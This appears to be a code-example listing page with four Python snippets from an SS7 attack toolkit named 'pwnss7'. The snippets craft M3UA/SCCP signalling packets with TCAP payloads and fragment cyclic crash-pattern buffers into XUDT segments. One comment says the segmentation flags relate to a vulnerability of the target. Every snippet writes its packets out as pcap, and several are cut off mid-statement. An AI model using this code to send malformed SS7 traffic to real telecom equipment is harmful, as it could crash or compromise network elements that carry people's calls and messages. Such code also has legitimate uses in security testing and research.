Ejemplo n.º 1
0
                                Asn1Obj(0x0, 0, 0x4,
                                        value='\x0f'),
                                Asn1Obj(
                                    0x0,
                                    0,
                                    0x4,
                                    value=
                                    '\xaa\x18\r\xa6\x82\xddl1\x19-6\xbb\xddF'),
                                Asn1Obj(0x2, 0, 0x0, value="\x91rgAX'\xf2"),
                            ]),
                    ]),
            ]),
    ])

f = StringIO()
encode_ber(f, tcap)
encoded_tcap = f.getvalue()

CALLED_GT = unhexlify('12930011047228190600')
CALLING_GT = unhexlify('1206001104722819604106')

pkt = encode_data(
    encode_udt(encoded_tcap, CALLED_GT, CALLING_GT),
    666,  # originating point code
    1337,  # destiantion point code
    0,  # signalling link selection
)

pcap = convert2pcap([pkt])
sys.stdout.write(pcap)
Ejemplo n.º 2
0
from pwnss7.util import cyclic, split_by, convert2pcap

msg = cyclic(8192)
xudt_size = 200

pkts = [frag for frag in split_by(msg, xudt_size)]

CALLED_GT = unhexlify('12930011047228190600')
CALLING_GT = unhexlify('1206001104722819604106')

# first XUDT: first segment and at least one remaining fragment
pkts[0] = encode_data(
  encode_xudt(
    pkts[0],
    1, 1, # first segment, one fragment remaining
    CALLED_GT, CALLING_GT,
  ),
  666, # originating point code
  1337,# destination point code
  0    # signalling link selection
)

# intermediate XUDT: not the first, but fragments remain
for i in range(1, len(pkts)-1):
  pkts[i] = encode_data(
    encode_xudt(
      pkts[i],
      0, 1, # last segment, but one fragment remaining. NOTE this is weird, and relates to a vulnerability of target
      CALLED_GT, CALLING_GT,
    ),
    666, # originating point code
    1337,# destination point code
Ejemplo n.º 3
0
import subprocess
import sys
from cStringIO import StringIO
from binascii import unhexlify
from itertools import islice
import string

# add pwnss7 directory to be able to import pwnss7 submodules
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))

from pwnss7.m3ua import encode_data
from pwnss7.sccp import fragment
from pwnss7.ber import encode_ber, decode_ber, Asn1Obj, encode_integer
from pwnss7.util import cyclic, convert2pcap

msg = cyclic(2048)
xudt_size = 200

CALLED_GT = unhexlify('12930011047228190600')
CALLING_GT = unhexlify('1206001104722819604106')

pkts = []
for xudt in fragment(msg, CALLED_GT, CALLING_GT, xudt_size):
    pkts.append(encode_data(xudt, 666, 1337, 0))

pcap = convert2pcap(pkts)
sys.stdout.write(pcap)
Ejemplo n.º 4
0
f = StringIO()
encode_ber(f, tcap)
encoded_tcap = f.getvalue()

xudt_size = 200
pkts = [frag for frag in split_by(encoded_tcap, xudt_size)]

CALLED_GT = unhexlify('12930011047228190600')
CALLING_GT = unhexlify('1206001104722819604106')

pkts[0] = encode_data(
    encode_xudt(
        pkts[0],
        1,
        len(pkts) - 1,  # first segment, one fragment remaining
        CALLED_GT,
        CALLING_GT,
    ),
    666,  # originating point code
    1337,  # destination point code
    0  # signalling link selection
)

for i in range(1, len(pkts) - 1):
    pkts[i] = encode_data(
        encode_xudt(
            pkts[i],
            0,
            len(pkts) - i - 1,
            CALLED_GT,
            CALLING_GT,
        ),